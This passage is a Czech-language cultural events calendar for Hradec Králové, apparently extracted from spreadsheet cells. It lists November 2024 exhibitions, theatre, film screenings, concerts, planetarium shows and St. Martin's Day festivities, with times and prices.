OPRAVÁRNA – švadlenka Ivča opraví vaše oblečení a bižuterii 10.00– 14:00 VÁNOČNÍ "RECY" TVOŘENÍ - kreativní workshop pro děti i dospélě s Ilonou Mach 11:00– 14.00: SLOW FASHION koutek s OSOBNÍ STYLISTKOU - vytvořte si přímo na swapu funkční a udržitelný outfit, který vám bude dělat dlouho radost! 10.00– 15:00 SWAP PLASTOVÝCH KVĚTINÁČŮ A ROSTLIN s firmou Plastia - doneste plastové květináče včetně těch poškozených - co se nevyswapuje, použije se na recyklaci a výrobu krásných nových květináčů! www.otockvetinac.cz Občerstvit se můžete po celou dobu v kavárně, kde si můžete dát kafíčko, čaj nebo něco dobrého na zub. A pak na swap znovu obhlídnout, co nového se na stojanech objevilo. 23.listopadu - sobota od 10:00 hodin Benefiční závod na podporu lesního klubu U Tří veverek. Sobota 23. 11. 2024 Dětské tratě zdarma - registrace na místě, dále hlavní závod na 5,5 a 10,5 km s registrací ideálně předem. Prezentace děti 9:30 - 10:15, START 10:30. Prezentace hlavní závod do 11:45, START 12:00. 23.listopadu - sobota od 11:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169, (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 (VERNISÁŽ) SALON VÝCHODOČESKÉ FOTOGRAFIE 23.listopadu - sobota od 15:00 hodin V reprezentativních prostorách Muzea východních Čech na Eliščině nábřeží v Hradci Králové proběhne dne 23. listopadu slavnostní zahájení výstavy 7. ročníku Salonu východočeské fotografie, vyhledávané přehlídky, která se koná jednou za tři roky, a je výběrovým přehledem aktuální tvorby fotografů nejen východních Čech . Své fotografie zde vystaví 41 autorů a 6 hostů (Radek Kalhous, Martina Kopecká Jurčeková, Ctibor Košťál , Zdeněk Vojáček, Luděk Vojtěchovský , Roman Vondrouš). Porotkyně Štěpánka Bieleszová , kurátorka sbírky fotografie Muzea umění Olomouc , a Kamila Bendorffová, fotografka, cestovatelka, organizátorka fotofestivalu v Blatné , ocenily širokou škálu stylů, témat a technologických procesů, z nichž každý divákovi nabízí něco jedinečného. Porota letošní 7. ročník Salonu východočeské fotografie chápe jako mimořádnou příležitost povzbudit a objevit regionální tvůrce, kteří, ačkoli nepůsobí v centru dění, jsou schopni velmi originálně vidět svět v novém světle. Vernisáž hudebně doprovodí kapela Paris. Součástí programu bude také přednáška Kamily Bendorffové s promítáním fotografií. Výstava potrvá do 19. ledna 2025. 23.listopadu - sobota od 15:30 hodin astronomická pohádka Oříšky - Hledání dokonalé planety, hvězdná obloha s živým výkladem lektora digitální planetárium a hvězdárna 90 minut pořad vhodný pro diváky od 8 let v doprovodu dospělé osoby V digitálním planetáriu se nejprve podíváme na hvězdnou oblohu a souhvězdí. Následně se proletíme vesmírem. V poslední části programu se podíváme na astronomickou pohádku Oříšky - Hledání dokonalé planety. Následně je možné navštívit ještě budovu hvězdárny. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Inscenace na motivy pohádky Boženy Němcové 23.listopadu - sobota od 16:00 hodin Inscenace na motivy pohádky Boženy Němcové Scénář: Barbora Pokorná, Jakub Vašíček Režie: Jakub Vašíček Hudba: Daniel Čámský Dramaturgie: Barbora Pokorná, Tomáš Jarkovský V jedné vesnici, nedaleko zámku, ve starém pekařském stavení žila s rodiči dívenka, které dali jméno Bohdanka. Ta při jedné z mnoha výprav na starou půdu, objevila na dně zaprášené truhly sedm bílých košilí. A s nimi i strašnou pravdu, které se se zarputilostí sobě vlastní rozhodla čelit. Žádná bolest přece nemůže být tak velká, aby ji zastavila. Snad jen kdyby jí do cesty přišla láska? Autorská inscenace na motivy klasické pohádky o hledání klidu v rozevláté mysli, o síle vůle a o neposedné duši, která může dojít pokoje až s notnou dávkou sebezapření a odvahou obětovat se pro druhé, doplňuje řadu drakovských inscenací, které staví na osvědčených pohádkových titulech. Po úspěšné Šípkové Růžence se kmenový režisér divadla Jakub Vašíček vrací k loutkovému zpracování známého příběhu v inscenaci určené divákům již od šesti let. Holy CowVingt Dieux 23.listopadu - sobota od 17:00 hodin Osmnáctiletý Totone žije v horském regionu Jura . Většinu času tráví popíjením piva s kamarády na zábavách. Ale brzy ho dostihuje realita: bude se muset postarat o svou sedmiletou sestřičku a vydělávat na živobytí. Vezme si do hlavy, že vyrobí nejlepší sýr v regionu. Hodlá s ním vyhrát zlatou medaili na zemědělské soutěži a spolu s ní 30 000 eur. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-23 18:00:00 2024-11-23 22:00:00 PŘEDADVENTNÍ ROLLOVÁNÍ VOL. 5 23.listopadu - sobota od 18:00 hodin Dovolujeme si Vás pozvat na již tradiční Rollování, které se uskuteční na tradičním místě v Country clubu Lucie a to už po 5. Můžete se těšit opět na kapelu Manual a naše 2 hosty, které zveřejníme v průběhu několika dní. Předprodej bude na obvyklých místech a letos nové přes smsticket: 23.listopadu - sobota od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Jiné světy · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Jiné světy. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. Tosca | Giacomo Puccini 23.listopadu - sobota od 18:45 hodin Obdivuhodná norská sopranistka Lise Davidsen ztvární titulní roli vášnivé operní pěvkyně v propracované režii Davida McVicara . V nadšeně očekávaném debutu v Metropolitní opeře vystoupí po jejím boku britsko-italský tenorista Freddie De Tommaso jako Tosčin milenec a malíř-revolucionář Cavaradossi. Sadistickému policejnímu řediteli Scarpiovi propůjčí svůj mocný hlas americký barytonista Quinn Kelsey. Pucciniho strhující hudbu plnou nezapomenutelných melodií provede orchestr Metropolitní opery v přímém přenosu 23. listopadu 2024 pod taktovkou maestra Siena Čanga . Dirigent: Sien Čang Režie: David McVicar Scéna a kostýmy: John Macfarlane Světelný design: David Finn Pohybová spolupráce: Leah Hausman Obsazení: Lise Davidsen (Tosca) Freddie De Tommaso (Cavaradossi) Quinn Kelsey (Scarpia) Patrick Carfizzi (Kostelník) Předpokládaná délka: 3 hod 5 min (včetně dvou přestávek) 400 vstupné 400 Kč | Velký sál | Bio Central Velký sál 2024-11-23 19:00:00 2024-11-23 21:00:00 HELENA VONDRÁČKOVÁ - 60 LET NA SCÉNĚ 23.listopadu - sobota od 19:00 hodin Helena Vondráčková a její doprovodná kapela Charlie Band vyrážejí na koncertní turné „HELENA 60 let na scéně". Jedná se o šesté turné v řadě v produkci Agentury MM Praha . Jako exkluzivní hosté se představí Tomáš Slavíček – tanečník, choreograf a především několikanásobný mistr světa ve stepu. S Helenou Vondráčkovou spolupracuje od roku 2009. V repertoáru mají řadu společných stepařských čísel, která mají u diváků vždy obrovský úspěch. A mladý nadějný zpěvák Nikolas Put. Každý koncert je přenášen na LED stěnu a doplněn unikátní videoprojekcí. Poslechnout si můžete nejen osvědčené hity jako je Dlouhá noc Sladké mámení, Dvě malá křídla tu nejsou, Já půjdu dál nebo Vzhůru k výškám, které se mezi fanoušky stále těší velké oblibě, písně ze 70. a 80. let v nových aranžmá, ale také novinky z posledního studiového alba Tvrdohlavá. Na hudební scéně působí Helena Vondráčková od roku 1964. Dosud vydala více než 90 LP a CD a celosvětově prodala 20 milionů hudebních nosičů. Je nositelkou mnoha domácích i mezinárodních ocenění. Účinkovala v mnoha úspěšných muzikálových projektech, ztvárnila několik rolí ve filmech, pohádkách a seriálech. Stále pravidelně vystupuje nejen doma, ale také v zahraničí, zejména na Slovensku , v Polsku a v Německu . Během své kariéry nazpívala více než 1700 písní a stále natáčí nové. Své poslední novinkové album Tvrdohlavá vydala v produkci Warner Music v roce 2020. Přijďte se podívat na jedinečnou LIVE show a užít si dlouhou noc s legendou české a slovenské populární hudby, mezinárodně nejúspěšnější českou zpěvačkou - Helenou Vondráčkovou . 23.listopadu - sobota od 19:00 hodin Ondřej Soukup - Gabriela Osvaldová - Petr Abraham MAKROPULOS musical Muzikálová adaptace známého dramatu Karla Čapka o touze po věčném mládí. Režie Petr Novotný . Píše se rok 1922. Začíná silvestrovská show, jejíž hlavní hvězdou je excelentní zpěvačka Emilia Marty, záhadná femme fatale, která obrátí život naruby každému, s kým se setká. Tentokrát ale sleduje svůj vlastní zájem, díky němuž je naživu už tři sta let - Věc Makropulos. Jak moc je krása lidského života ovlivněná tím, že nejsme nesmrtelní? Představitelka hlavní role Petra Janečková byla za roli Emilie Marty v užší nominaci na Cenu Thálie 2023! Délka představení 2:20 s přestávkou. uvádí Východočeské divadlo Pardubice NA TOTO PŘEDSTAVENÍ JE MOŽNO VYUŽÍT SENIORSKOU A STUDENSTKOU SLEVU 50%. 470 vstupné 250 Kč, 470 Kč | Sál Filharmonie Hradec Králové | Sál Filharmonie HK - Ostatní pořadatelé Sál Filharmonie Hradec Králové 2024-11-23 19:00:00 2024-11-23 21:00:00 23.listopadu - sobota od 19:00 hodin Utkání fotbalové Chance ligy. Laura WadeRežie: Jan Holec 23.listopadu - sobota od 19:00 hodin Judy je dokonalá žena. Její domácnost je čistá i v tom nejzapadlejším koutku, košile jsou vždy perfektně vyžehlené, jídlo navařené, a když se manžel Johnny vrátí udřený z práce, čeká na něho koktejl a nahřáté papuče. Perfektní domácnost jak z reklamy z padesátých let. Dokonalý život v dokonalé době. Až na to, že je rok 2021. Judy se však rozhodla mít dokonalý domov, ať to stojí, co to stojí. Je však možné žít ve snu, aniž bychom tak ublížili našim blízkým? Svižná, chytrá komedie z pera úspěšné britské dramatičky Laury Wade se zabývá postavením mužů a žen ve společnosti, to vše v nádherné retro estetice padesátých let. Tato hra se s lehkostí a humorem zamýšlí nad touhou dnešního člověka opustit složitý svět plný stresu a zmatku a vrátit se do doby, kdy vše mělo jednoduchá a jasná pravidla a věci byly nablýskané a krásné. Autorce se pomocí vtipných dialogů a skvěle napsaných postav nejen podařilo oživit nádherný svět idealizované minulosti, ale též se rafinovaně dotknout palčivých problémů, které trápí člověka v dnešní přetechnizované a chaotické době. Hra slavila v Anglii obrovský úspěch a získala celkem pět nominací na nejprestižnější britskou divadelní cenu Laurence Oliviera , včetně té za nejlepší novou komedii. Délka představení 2:45 s přestávkou. 320 vstupné 280 Kč, 320 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-23 19:00:00 2024-11-23 20:30:00 23.listopadu - sobota od 19:00 hodin hraje divadelní soubor Klicpera Chlumec nad Cidlinou Dva tisíce let stará komedie, jež na pozadí milostného příběhu z dob starého Říma zpřítomňuje a prověřuje samotné základy komična a divadelního humoru. 23.listopadu - sobota od 19:30 hodin Horkýže Slíže zamíří 23.11.2024 do MOODU, vstupenky v předprodeji: bit.ly/horkyze (MÁLO)MOCNÍ 23.listopadu - sobota od 19:30 hodin Proč udělat z dokonale šťastného kokršpaněla nešťastného člověka? Psychiatrická léčebna, kde nic není tak, jak se zdá. Na motivy povídky E. A. Poea v režii Terezy Vodochodské . Just the Two of UsL'Amour et les forets 23.listopadu - sobota od 20:30 hodin Když Blanche potkává Grega, zdá se jí, že našla toho pravého. Pouta, která je spojují, se rychle prohlubují a vzniká mezi nimi vášnivý vztah. A Blanche se postupně ocitá ve spárech majetnického a nebezpečného muže. Muže, kterého se ze strachu a z ostychu neodvažuje udat. Protože Gregova nadvláda může skončit jedině dvěma způsoby: buď se jeho oběť zhroutí nebo osvobodí. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>46</t>
  </si>
  <si>
    <t>20241101_628_3239872505_661d7f5547b38cedb143.html</t>
  </si>
  <si>
    <t>661d7f5547b38cedb143</t>
  </si>
  <si>
    <t>Kalendarium 19.prosinec - čtvrtek od 19:30 hodin Kulturní akce dne: 11. 11. 2024 2024-11-04 08:00:00 2024-11-30 12:00:00 FOTÍME EVROPU, JIŽ 20 LET! 11.listopadu - pondělí od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 11.listopadu - pondělí od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 11.listopadu - pondělí od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala . 11.listopadu - pondělí od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 11.listopadu - pondělí od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169 (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 11.listopadu - pondělí od 10:30 hodin Tragikomická freska o rozpadu světa, tak jak ho známe. Král Lear je považován za autorovu „nejtragičtější“ hru, ale její zápletka až podezřele připomíná pohádkové Sůl nad zlato. Pohádka a zároveň obraz zkázy – Shakespere se neleká divokých, šílených spojení. Lear je hra, kde blázen vede slepého, kde se všechno převrací ve svůj opak, kde staré umírá a nové se ještě nezrodilo. Lear se zbavuje moci, aby si už jen užíval – a moc ho dožene k šílenství i poznání. Kupodivu se v celé té tragédii najde i mnoho humoru a vtipných situací, což je voda na mlýn režie Michala Háby , který s oblibou řeší vážné věci s humorem a naopak. Rozpad. Humor. Smrt. A stále Shakespeare. Režisér Michal Hába patří k nejoriginálnějším českým režisérům. Pro svůj návrat do Klicperovo divadla si po kultovním Lakomci či poslední “coolnes” Maryše zvolil další klasiku. Opět se tak můžete těšit na činohru evropského střihu, která se nebojí používat humor hodný Hradce . Současné divadlo o současném světě „Now you know“. 160 vstupné 160 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-09 11:31:00 2024-11-17 11:31:00 VÝSTAVA MODELŮ ŽELEZNIC 11.listopadu - pondělí od 11:31 hodin Od 9. Do 17. listopadu 2024 se na královéhradeckém hlavním nádraží uskuteční tradiční – letos již 39. výstava železničních modelů a kolejišť s mezinárodní účastí. Návštěvníci zde uvidí nejen modely od našich modelářů, ale například i kolejiště od německého kolegy a kolejiště velikosti TT od firmy Tillig. Ve spolupráci s německým Saským svazem modelářů bude stejně jako v loňském roce k dispozici dílnička pro nejmenší modeláře, kde si pod odborným vedením mohou postavit například domeček a ten si pak samozřejmě odnést na památku domů. V provozu bude velké klubové kolejiště HO – Velký Brod, tradiční kolejiště s motivem Ameriky a další menší, z nichž zajímavé bude určitě kolejiště ze stavebnice LEGO. Celkem se na výstavě budou malé vláčky prohánět na sedmi kolejištích. Pro ty nejmenší děti bude k dispozici v minulých letech velmi oblíbený hrací koutek, kam mohou dospěláci případně „odložit“ své ratolesti a v klidu si prohlédnout výstavu. Statické modely, ať už tovární, či našich modelářů budou ke zhlédnutí ve vitrínách a v případě zájmu bude možné v prodejně na místě zakoupit nejen některé nové i použité tovární modely, ale třeba i omalovánky, vystřihovánky a klubový stolní kalendář na rok 2025. Ten bude možné i vyhrát v případě, že na zadní stranu vstupenky napíšete své telefonní číslo a vhodíte ji při odchodu do schránky u pokladny. Každý den se na jednoho návštěvníka usměje štěstí v podobě tohoto kalendáře. Přístup na výstavu je z 1. nástupiště ve všední dny od 14 do 18 hodin, o víkendu a ve svátek od 9 do 18 hodin. Dopolední hodiny ve všedních dnech jsou vyhrazeny pro předem objednané skupiny školních či předškolních dětí a jsou doplněny i programem. Objednat prohlídku je možné telefonicky nebo SMS zprávou na čísle 602 406 234. Vstupné na výstavu je pro dospělého 100 Kč a pro děti 50 Kč. 11.listopadu - pondělí od 14:00 hodin Zimou turistická sezóna v Hradci Králové a na Hradecku nekončí Letošní jedenáctý listopad bude znovu dnem, kdy bílý kůň coby symbol přicházející zimní turistické sezóny doveze v 16:30 Martina pod Bílou věž na Velké náměstí. Program: zahájení kulturního programu na pódiu vystoupení komorního ženského sboru Vokální Harmonie 16:30 příjezd Martina na bílém koni pod Bílou věž fanfáry Trombón-band pozvánky na kulturní a společenské akce představení zajímavostí zimní turistické sezóny pozvánky na adventní a vánoční trhy ochutnávka svatomartinských rohlíčků Doprovodný program 14:00 – 18:00 minijarmark: prodej svatomartinských rohlíčků a svatomartinského vína , perníčků, horké medoviny, čokolády, svařeného vína a dekorativního zboží občerstvení prezentace informačních materiálů města Hradec Králové , měst České inspirace, Královských věnných měst, Hradecka a Královéhradeckého regionu 15:30 – 16:00 koncert v kapli sv. Klimenta , ZUŠ Habrmanova 17:30 – 18:00 varhanní koncert v katedrále sv. Ducha, ZUŠ Střezina 16:45 – 17:45 svezení dětí na koni (děti jménem Martina a Martin mají přednost) 14:00 – 17:30 volné prohlídky kaple sv. Klimenta 14:00 – 18:00 volné prohlídky katedrály sv. Ducha 14:00 – 20:00 vstup na Bílou věž, děti do 15 let zvýhodněné vstupné 1 Kč, každé dítě obdrží ke vstupence malý dárek (poslední prohlídka v 19:00 hod.) Změna programu vyhrazena. KERAMIKA HRAVĚ A KREATIVNĚ 11.listopadu - pondělí od 16:00 hodin Keramika pro děti hravě a kreativně – schopnost tvořit máme všichni a právě hlína je úžasným materiálem, který nás vrací hluboko do minulosti, kdy ještě člověk ovládal řemeslo a souzněl s přírodou. Právě teď je ta doba, kdy je třeba dávat důraz na tradici, řemeslo, kreativitu a estetiku a odbíhat od moderních technologií, chytrých telefonů a bloumání po sociálních sítích, zejména v případě mladé generace, která tráví spoustu času ve virtuálním světě. A právě hlína a její hnětení a tvarování a formování nás uvádí do přítomného okamžiku, kdy dochází ke zklidnění a soustředění se na to, co právě vytvářím. Kurz keramiky v Médiu je zaměřený na rozvíjení fantazie, podporu tvořivosti, nápaditosti a výtvarného cítění, seznámí děti s keramickým řemeslem a jeho základy a pravidly. Pod odborným dohledem děti samy mohou vytvářet menší i větší díla, bude jim nabídnuto široké spektrum materiálů a výrobních technik a zároveň se naučí pracovat s glazurami. Radost z výsledků práce bude umocněna, když si své originální výtvory a dílka z keramiky odnesou domů. Práce s keramickou hlínou v dětech podporuje kreativní myšlení a rozvíjí jemnou motoriku a díky svým relaxačním účinkům je vhodná i pro děti s poruchou pozornosti a děti s ADHD. Lektorka: Martina Jiroutová, výtvarnice Kurz je určen pro všechny děti od 7 do 13 let a je i pro děti nepozorné a hyperaktivní Každé pondělí od 16,00 do 17,30 hod. v keramické dílně v Médiu VÝTVARNÁ DÍLNA – PRSTOVÉ LOUTKY 11.listopadu - pondělí od 16:00 hodin Chcete si vytvořit své vlastní prstové loutky? Tak přijďte k nám na výtvarnou dílnu! Dílnu povede lektorka Ivana Votavová , která má bohaté zkušenosti s metodou suchého plstění. Vstupné je dobrovolný příspěvek na materiál. WORKSHOP – MALOVÁNÍ NA TAŠKU NEBO BATOH 11.listopadu - pondělí od 16:00 hodin Přijďte si vyzkoušet malování na tašku nebo batoh. Pomocí barev na textil a popisovačů si můžete vyrobit vlastní originální tašku, nebo batoh, který si odnesete domů. Přihlášení na stepaja1@seznam.cz. Vstupné 800 Kč. VYROB SI NŮŽ 11.listopadu - pondělí od 17:00 hodin Máš chuť vyrobit si něco praktického? Tak doraž a vyrob si nůž pod vedením architekta a kutila Patrika Zamazala. Vyrobíme si rukojeti a předpřipravenou čepel nože si bude každý moci nabrousit. Pokud zbyde ještě prostor, bude možné si na nůž vyrobit i pouzdro. Materiál i nástroje pro workshop budou zajištěné, stačí ti jen koupit si vstupenku. Cenu spolu s odkazem na vstupenky bude upřesněna na stránkách akce https://www.facebook.com/events/1259768912070152. JAK SE VYROVNAT S VÁŽNÝMI ŽIVOTNÍMI ZTRÁTAMI 11.listopadu - pondělí od 17:00 hodin Trápí vás ztráta milované osoby? Ztráta zdraví, zaměstnání nebo rozvod? Přijďte se dozvědět, jak se vyrovnat s takovými těžkostmi. Celou přednáškou vás provede Ing. Andrejka Vokálová. Na závěr přednášky vás čeká zážitková meditace, která vám pomůže najít vnitřní klid a prostor pro rozloučení s těmi, s nimiž cítíte, že potřebujete uzavřít určitou kapitolu svého života. Vstup volný. OSLAVA SVÁTKU SV. MARTINA NA JIRÁSKOVĚ NÁMĚSTÍ 11.listopadu - pondělí od 17:00 hodin Srdečně zveme na tradiční oslavu svátku sv. Martina na Jiráskově náměstí. Těšit se můžete na lampiónový průvod, soutěž o nejlepší svatomartinské rohlíčky, výborné občerstvení a samozřejmě také příjezd sv.Martina. Oslavme společně příchod zimy! WavesVlny 11.listopadu - pondělí od 17:30 hodin Dobový film Vlny režiséra Jiřího Mádla ukáže napínavé a doposud utajené příběhy novinářů Československého rozhlasu. Na konci 60. let, kdy zněl z rádiových vln rokenrol a studentské revolty měnily svět, nastoupí starší z bratrů do prestižní redakce rozhlasu. Záhy se ocitne v nebezpečném souboji redaktorů a tajných služeb. Ve víru událostí půjde brzy všem o život a hlavní hrdina stojí před drsnou volbou: ochránit bratra, nebo pravdu a kolegy? Film je inspirován skutečným příběhem skupiny novinářů mezinárodní redakce Československého rozhlasu a jejich odhodláním přinášet nezávislé zprávy za každou cenu. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-11 18:00:00 2024-11-11 19:40:00 State of EmergencyVýjimečný stav 11.listopadu - pondělí od 18:00 hodin Rozhlasový zpravodaj na Blízkém východě Karel Beran přijíždí na základě anonymu na otočku soukromě do Prahy . V Kamburu, který neprofesionálně opustil, však právě ve stejnou chvíli vypuká revoluce. Dostát povinnosti reportéra donutí zkušeného profesionála k mystifikačním reportážím, kdy vřavu arabské revoluce simuluje na kuchyňských spotřebičích ve vinohradském bytě. Rozkročen mezi řešením osobního problému a povinností zpravodajsky informovat posluchače se však chytne do vlastní pasti. Když se na základě vysoce sledovaných příspěvků rozhodně Český rozhlas poslat za zpravodajem podpůrný tým, ocitne se před neřešitelnou volbou: buď se přizná k mediálnímu podvodu, nebo musí předstírat vlastní smrt. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-11 19:00:00 2024-11-11 20:30:00 JDI ZA ŠTĚSTÍM - MARIAN VOJTKO A BOHUŠ MATUŠ 11.listopadu - pondělí od 19:00 hodin Vzpomínkový koncertní pořad „Jdi za štěstím“ v podání Bohuše Matuše a Mariana Vojtka nabízí ohlédnutí za největší osobností naší populární scény, Karlem Gottem . Za doprovodu skvělé kapely Charlie Blažek Band uslyšíme největší hity této pěvecké legendy v podání těchto skvělých muzikálových osobností jako například „Lady karneval, Kávu si osladím, Stokrát chválím čas, Je jaká je, Když milenky pláčou“ aj. Nevšední zážitek umocní jistě nejedna historka obou protagonistů. Marian Vojtko Držitel ceny Thálie, představitel titulních rolí muzikálů Fantom opery, Ples upírů, Dracula, Bídníci, Monte Cristo, Jekyll &amp;amp; Hyde nebo Baron Prášil. Účinkoval také v představeních Muž se železnou maskou, Kleopatra, Tři mušketýři, Aida nebo Krysař. Bohuš Matuš Účinkoval v divadle Semafor, v Hudebním divadle Karlín a hostoval také ve Státní opeře Praha ( Boris Godunov ). Vytvořil role v muzikálech Fantom opery, Ples upírů, Monte Cristo, Angelika, Dracula nebo Johanka z Arku. Koncert české a italské soudobé hudby 11.listopadu - pondělí od 19:30 hodin Off program Festivalu Hudební fórum 2024. CESTY VEDOUCÍ Podzimní koncert české a italské soudobé hudby A. Corelli, G. Aloisi , A. Hába, F. Donatoni, M. Kux-Král, J. Mysliveček , V. Ruggiero Vincenzo Ruggiero kytara 150 vstupné 150 Kč | Kavárna CaféFilharmonie | Filharmonie Hradec Králové Kavárna CaféFilharmonie 2024-11-11 20:00:00 2024-11-11 22:00:00 URALT + SUPPORT 11.listopadu - pondělí od 20:00 hodin Když se řekne AL BURIAN, na první dobrou to jméno jen tak někomu moc nepoví. Jenže! Tenhle chlápek už do toho řeže několik dekád a stojí za celou řadou výjimečných hudebních projektů. Vzpomeňme určitě MILEMARKER - pusťte si záznam z koncertu a neříkejte, že vám z něj nenaskočí husí kůže. No a ANARKUSS? Tahle dvojka je v Hradci už skoro jako doma, v Bajkazylu jste je mohli vidět a slyšet sotva pár týdnů zpátky. A další a další. Takže Al Burian, už víte? Fajn, tak zas na všechno zapomeňte. Protože tenhle Al, pro kterého v muzice neexistuje tabu, teď přijíždí s dalším projektem a zas se hudebně utápíme v docela jinačím bahně. Už název debutního ep ZUKUNFT WIRD BRUTAL naznačuje, co nám chtějí ＵＲＡＬＴ vlít do hlavy. 0 % radosti, 100 % deprese. Temné, hlučné a neveselé cosi s příměsí post-hardcoru a metalu, po čem se nebudete cítit ani trochu dobře a budete pochybovat o smyslu všeho. Prostě - nejen Zukunft wird brutal. Anora 11.listopadu - pondělí od 20:15 hodin Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. Když si v klubu její společnost objedná mladý a bohatý Rus Ivan, zajiskří to mezi nimi a po pár týdnech si říkají ano na spontánní svatbě ve Vegas . Je možné, že Anora našla svého prince na bílém koni? Ivanovi rodiče si to nemyslí. Strhující, vtipná a šílená jízda režiséra Seana Bakera (The Florida Project) získala Zlatou palmu v Cannes a první diváci ji označují za minimálně stejně zábavnou podívanou jakou je jiný vítěz stejné ceny, Trojúhelník smutku. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-11 20:30:00 2024-11-11 22:26:00 Lee 11.listopadu - pondělí od 20:30 hodin Lee Millerová (Kate Winslet) začala svou kariéru jako prominentní modelka, pohybující se v předních módních kruzích Paříže a New Yorku . V roce 1938 tráví dovolenou na prosluněném jihu Francie se svými nejbližšími přáteli z uměleckých kruhů. Soustředí se již výhradně na svou vlastní práci jako fotografka. Její osudovou láskou se stává anglický obchodník s uměním, Roland Penrose ( Alexander Skarsgard ). Hrozba války visí ve vzduchu a téměř přes noc se všechno v jejich každodenním životě zcela změní. Po přestěhování do Londýna Lee odmítá dělat, co se od žen během války očekává. Místo toho se rozhodne postavit patriarchátu a dokázat nemožné. Samotná se vydává na frontu v Evropě . Jako válečná korespondentka a fotografka pro magazín Vogue se ocitá v první linii nejkrutějších bojů druhé světové války. Její hluboké pochopení a empatie pro ženy a bezhlasé oběti hrozných zločinů jí umožní vytvořit snímky zachycující jak křehkost, tak nezlomnou zuřivost a lidskou schopnost přežít, existovat, bojovat, bránit se a žít. Lee je často vnímaná jako model a múza, ale její vnitřní síla, houževnatost, vášeň pro život a odvaha riskovat jí pomohlo vytvořit děsivě naléhavé snímky, které se nesmazatelně vryjí do historie. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_629_3239872444_0ae6fbb6a0a8ebf3995c.html</t>
  </si>
  <si>
    <t>0ae6fbb6a0a8ebf3995c</t>
  </si>
  <si>
